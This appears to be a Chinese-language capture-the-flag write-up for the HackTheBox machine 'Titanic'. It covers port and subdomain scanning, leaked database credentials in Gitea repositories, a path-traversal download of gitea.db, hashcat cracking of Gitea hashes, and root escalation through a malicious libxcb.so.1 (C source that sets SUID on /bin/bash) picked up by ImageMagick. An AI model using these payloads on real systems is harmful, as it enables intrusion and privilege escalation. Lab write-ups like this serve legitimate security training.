基本信息

https://app.hackthebox.com/machines/Titanic
10.10.11.55

端口扫描

22和80:

$ nmap -sC -sV -Pn 10.10.11.55
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-20 14:34 CST
Nmap scan report for 10.10.11.55
Host is up (0.070s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 73:03:9c:76:eb:04:f1:fe:c9:e9:80:44:9c:7f:13:46 (ECDSA)
|_  256 d5:bd:1d:5e:9a:86:1c:eb:88:63:4d:5f:88:4b:7e:04 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://titanic.htb/
Service Info: Host: titanic.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.70 seconds

80

需要加hosts：

1	10.10.11.55 titanic.htb

游轮服务相关的：

子域名扫描

子域名可以发现dev：

1
2
3

ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://titanic.htb/" -H 'Host: FUZZ.titanic.htb'  -fw 20

dev                     [Status: 200, Size: 13982, Words: 1107, Lines: 276, Duration: 209ms]

dev

添加hosts后访问,是gitea：

gitea

gieta直接探索可以看到两个项目：

其中可以找到一些信息：

# http://dev.titanic.htb/developer/docker-config/src/branch/main/mysql/docker-compose.yml
MYSQL_ROOT_PASSWORD: 'MySQLP@$$w0rd!'
MYSQL_DATABASE: tickets 
MYSQL_USER: sql_svc
MYSQL_PASSWORD: sql_password

# http://dev.titanic.htb/developer/docker-config/src/branch/main/gitea/docker-compose.yml
 - /home/developer/gitea/data:/data # Replace with your path

flask-app

flask-app看起来就是主站的代码，download那里拼接用户输入到路径，很明显的LFI：

LFI

所以回到主站那里，订票后自动有下载请求，验证存在LFI：

gitea.db

前面看到有gitea服务，所以去下载对应的数据库文件，根据docker文件中的路径，知道数据库文件路径是：

1
2
3

/home/developer/gitea/data/gitea/gitea.db

http://titanic.htb/download?ticket=../../../home/developer/gitea/data/gitea/gitea.db

查看数据库，得到一些hash,破解出：

Crack the Gitea password using hashcat. The script was taken from an IppSec’s video. [https://youtu.be/aG_N2ZiCfxk?t=2419]
https://gist.github.com/h4rithd/0c5da36a0274904cafb84871cf14e271

python3 gitea3hashcat.py gitea.db

administrator:sha256:50000:LRSeX70bIM8x2z48aij8mw==:y6IMz5J9OtBWe2gWFzLT+8oJjOiGu8kjtAYqOWDUWcCNLfwGOyQGrJIHyYDEfF0BcTY=
developer:sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y= 

sudo hashcat --username hash.txt  ~/Tools/dict/rockyou.txt

25282528

user flag

developer用户ssh登录：

提权信息

opt下面有一个identify_images.sh，对图片做一些处理：看起来是root自动运行的：

使用imagemagic，搜索发现可能的漏洞：

Arbitrary Code Execution in AppImage version ImageMagick · Advisory · ImageMagick/ImageMagick
https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-8rxc-922v-phg8

提权 & root flag

按照漏洞公告中的信息，创建so后等待触发即可：

cd /opt/app/static/assets/images

gcc -shared -fPIC -o libxcb.so.1 -x c - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void init() {
    system("chmod +s /bin/bash");
    exit(0);
}
EOF

cp entertainment.jpg root.jpg

shadow

1
2

root:$y$j9T$FEVNYiA6DwY7GiuIjF42Y0$DqhzPlCnT7fI5E3c6LQ0Wx7ym/PhY0swKTKUczhwwv6:19937:0:99999:7:::
developer:$y$j9T$Sof1eV6yeubj9QaCTbzxd1$WsWRB9X8pgYiJozBaqsEsA/wJRjlWk6iKXv6VNG/fU5:19937:0:99999:7:::

参考资料

Crack the Gitea password using hashcat. The script was taken from an IppSec’s video. [https://youtu.be/aG_N2ZiCfxk?t=2419]
https://gist.github.com/h4rithd/0c5da36a0274904cafb84871cf14e271
Arbitrary Code Execution in AppImage version ImageMagick · Advisory · ImageMagick/ImageMagick
https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-8rxc-922v-phg8

Titanic - HackTheBox

2025-02-20